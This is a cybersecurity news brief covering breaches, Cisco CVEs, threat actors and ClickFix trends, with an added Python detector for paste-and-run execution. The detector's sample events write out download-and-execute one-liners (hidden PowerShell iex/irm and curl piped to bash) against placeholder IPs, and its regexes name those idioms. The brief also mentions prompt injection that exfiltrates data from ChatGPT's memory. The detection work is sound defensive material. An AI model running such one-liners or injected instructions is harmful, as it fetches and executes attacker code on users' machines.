Cybersecurity Brief – 2025-11-07
Major Incidents or Breaches
- The U.S. Congressional Budget Office (CBO) confirmed a cybersecurity incident attributed to a suspected foreign threat actor. Sensitive data may have been exposed.
- SonicWall disclosed that a nation-state actor breached its cloud backup service, stealing firewall configuration files of all customers using the service. This incident is not connected to recent Akira ransomware activity.
- Hyundai AutoEver America reported a data breach from February, with attackers stealing Social Security Numbers and other personal information.
- The State of Nevada completed recovery from a ransomware attack that began as early as May 2025 and was discovered in August. The attack impacted 60 state agencies and disrupted critical health and public safety services.
- The DeFi protocol Balancer began recovering funds after hackers exploited a vulnerability to steal $128 million in cryptocurrency.
- New data revealed that UK water systems have been targeted by hackers five times since 2024, highlighting increased risks to critical infrastructure.
Newly Discovered Vulnerabilities
- Cisco released patches for two critical vulnerabilities in its Unified Contact Center Express (UCCX) software. CVE-2025-20354 allows an unauthenticated remote attacker to upload arbitrary files and execute commands with root privileges through the Java RMI process, and CVE-2025-20358 allows an attacker to bypass authentication to the CCX Editor and run arbitrary scripts with administrative privileges. Internet-exposed UCCX management interfaces should be patched or restricted immediately.
- Multiple security vulnerabilities were disclosed in ChatGPT, centred on its web search/browsing and memory features. Indirect prompt injection through content fetched during browsing, combined with persistence of injected instructions in memory, could allow data exfiltration, bypassing of safety mechanisms, and other malicious actions without the user noticing.
Notable Threat Actor Activity
- Russian state-backed group Sandworm deployed multiple data-wiping malware families in attacks targeting Ukraine’s education, government, and grain sectors.
- A previously unknown threat cluster impersonated ESET in phishing campaigns against Ukrainian entities, distributing trojanized installers that deploy the Kalambur backdoor.
- SonicWall attributed the cloud backup breach to a state-sponsored actor. Stolen firewall configurations can contain credentials and shared secrets (for example VPN pre-shared keys and administrative or service-account passwords), so affected customers should treat those as exposed and rotate them.
- Phishing campaigns are actively targeting LastPass users with fake death notifications claiming a relative has requested emergency access to the victim's vault, in an attempt to harvest credentials and take over accounts. Microsoft Help Desk-themed phishing emails also continue to circulate.
Trends, Tools, or Tactics of Interest
- A malicious Visual Studio Code (VS Code) extension with ransomware capabilities was discovered on the official marketplace. The extension, apparently created with AI assistance, can encrypt files on a victim’s system.
- ClickFix campaigns, which trick users into copying a command from a fake error or verification page and running it themselves, have evolved to include multi-OS support, video tutorials walking victims through self-infection, countdown timers to pressure users, and automatic OS detection to serve the matching payload.
- Android malware leveraging NFC technology is being used to steal card details and PINs for instant ATM withdrawals.
- Deepfake and synthetic video technologies are increasingly being abused for fraud, requiring enhanced verification protocols.
- Cybercrime is increasingly funding organized crime, with online scams supporting real-world criminal activities and violence-as-a-service models.
- Continuous purple teaming and breach and attack simulation (BAS) are being promoted as effective ways to validate security controls and close detection gaps in enterprise environments.
- Agentic AI tools are being integrated into attack chains, requiring stronger oversight, least privilege, and red-teaming to mitigate risks.
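Because a ClickFix infection is executed by the victim, the durable detection point is the process-creation artifact rather than the lure page. The following Python script is an added example (not from the brief or any vendor product) that scores process-creation events for the traits that execution leaves behind on both Windows and macOS: a script host spawned directly from the desktop shell or a terminal, a download-and-execute one-liner, hidden-window or policy-bypass flags, and the fake "verification" string lures often append. The event field names (`image`, `parent_image`, `command_line`), the thresholds and all sample events are constructed for this example; map the fields to your Sysmon Event ID 1 or EDR telemetry.

```python
"""Heuristic scoring of process-creation events for ClickFix-style
"paste this command to fix it" execution.

Added example, not from the brief or any vendor tooling. The event schema
(image, parent_image, command_line) and the sample events below are
constructed; adapt the field names to your own telemetry export.
"""
import re
from dataclasses import dataclass, field

# Script hosts that ClickFix one-liners are pasted into, by OS family.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",  # Windows
    "bash", "sh", "zsh", "osascript",  # macOS / Linux
}
# A parent that is the desktop shell or a terminal means a human typed or pasted the
# command (Win+R Run dialog, Terminal), not a service, scheduler or installer.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2", "gnome-terminal"}

# Download-and-execute idioms seen in pasted one-liners (PowerShell, curl|sh, mshta URL).
DOWNLOAD_EXEC = re.compile(
    r"\b(iex|invoke-expression|irm|invoke-restmethod|invoke-webrequest|downloadstring)\b"
    r"|\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"
    r"|\bmshta(\.exe)?\s+https?://",
    re.IGNORECASE,
)
# Flags that hide the window or defeat script policy.
EVASION_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-enc(odedcommand)?\b|-e(xecutionpolicy|p)\s+bypass",
    re.IGNORECASE,
)
# Lure pages append a fake CAPTCHA/verification string as a comment so the pasted text looks legitimate.
FAKE_VERIFICATION = re.compile(r"#.*(not a robot|captcha|verif)", re.IGNORECASE)

THRESHOLD = 5  # events scoring >= 5 are ClickFix candidates worth triage


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)


def _basename(path: str) -> str:
    """Last path component, lower-cased, for either Windows or POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def score_event(ev: dict) -> Verdict:
    """Score one process-creation event; each matched trait adds points and a reason."""
    image = _basename(ev.get("image", ""))
    parent = _basename(ev.get("parent_image", ""))
    cmd = ev.get("command_line", "")
    v = Verdict()
    if image in SCRIPT_HOSTS:
        v.score += 1; v.reasons.append(f"script host: {image}")
    if parent in INTERACTIVE_PARENTS:
        v.score += 2; v.reasons.append(f"launched from interactive shell: {parent}")
    if DOWNLOAD_EXEC.search(cmd):
        v.score += 3; v.reasons.append("download-and-execute one-liner")
    if EVASION_FLAGS.search(cmd):
        v.score += 1; v.reasons.append("hidden window / execution-policy bypass flags")
    if FAKE_VERIFICATION.search(cmd):
        v.score += 2; v.reasons.append("fake verification text appended to command")
    return v


def detect(events, threshold=THRESHOLD):
    """Return [(index, Verdict)] for the events at or above the threshold."""
    return [(i, v) for i, v in enumerate(map(score_event, events)) if v.score >= threshold]


# Constructed sample events (IPs from documentation ranges, paths and users invented).
SAMPLE_EVENTS = [
    {   # Windows ClickFix: Win+R, paste, Enter
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": r'powershell -w hidden -nop -c "iex (irm http://198.51.100.23/verify.txt)" # "I am not a robot - reCAPTCHA Verification ID: 7391"',
    },
    {   # macOS variant of the same lure, pasted into Terminal
        "image": "/bin/bash",
        "parent_image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
        "command_line": 'bash -c "curl -fsSL http://203.0.113.9/fix.sh | bash"',
    },
    {   # Benign: management agent running an inventory script (policy bypass alone is not enough)
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Program Files\Microsoft Configuration Manager\CcmExec.exe",
        "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    },
    {   # Benign: user opens a command prompt from the Run dialog (interactive parent alone is not enough)
        "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": r'"C:\Windows\System32\cmd.exe"',
    },
]

if __name__ == "__main__":
    for i, v in detect(SAMPLE_EVENTS):
        print(f"event {i}: score {v.score}: " + "; ".join(v.reasons))
```

The two benign events show why the scoring is additive: an interactive parent or a policy-bypass flag on its own is everyday administration, while the combination of an interactive parent with a remote fetch piped into an interpreter is what a pasted lure produces. On Windows the pasted text also persists in the user's RunMRU registry key, which is a useful forensic cross-check when triaging a hit.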
Regulatory or Policy Developments Affecting the Security Industry
- Financial services are now subject to prescriptive regulatory requirements for cyber-resilience, moving beyond best practices to operational mandates.
- New initiatives are being launched to increase transparency in social media advertising, aiming to address the proliferation of scam ads.
- Increased focus on privacy controls, as evidenced by updates to consumer security products, reflects evolving regulatory and user expectations.